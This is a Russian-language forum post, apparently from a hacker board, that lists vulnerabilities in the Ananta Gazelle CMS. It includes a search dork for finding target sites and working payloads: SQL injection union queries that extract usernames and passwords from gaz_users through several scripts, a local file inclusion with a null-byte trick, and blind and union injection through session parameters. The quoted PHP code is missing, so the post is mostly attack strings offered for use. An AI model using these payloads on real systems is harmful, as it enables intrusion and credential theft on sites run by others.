![]() |
Уязвимости Ananta Gazelle
Ananta Gazelle Product : Ananta Gazelle Dork : "CMS: Ananta Gazelle" Site: http://www.anantasoft.com/ Found by: Dimi4 Date : 22.04.09 Пробегся быстренько по коду: Довольна интересная скуль. Рассмотрим user.php PHP код:
Регестрируемся на сайте как: Код:
a' union select concat_ws(0x3a,name,pass),2,3,4+from+gaz_users --Код:
user.php?user=a' union select concat_ws(0x3a,name,pass),2,3,4+from+gaz_users --forgot.php PHP код:
Код:
POST: email=e' union select concat_ws(0x3a,name,pass),2,3,4,5,6,7,8,9+from+gaz_users --http://localhost/Ananta_Gazelle1.0/admin/edituser.php Sql-inj remove.php PHP код:
Код:
POST: number=1' union select concat_ws(0x3a,name,pass),2,3,4,5+from+gaz_users --Name xek; Code: PHP код:
|
Anantasoft Gazelle CMS 1.0 LFI need: mq=off file: index.php PHP код:
PHP код:
Код:
GET /index.php?template=../../[local_file]%00blind SQL-Injection need: mq=off, rg=on file: modules/login.php PHP код:
Код:
GET /index.php?_SESSION[name]=admin'+and+substring(version(),1,1)=5+--+SQL-Injection need: mq=off, rg=on file:change.php PHP код:
Код:
GET /change.php?_SESSION[name]=1'+union+select+1,version(),3,4,5,6+--+ |
| Время: 13:40 |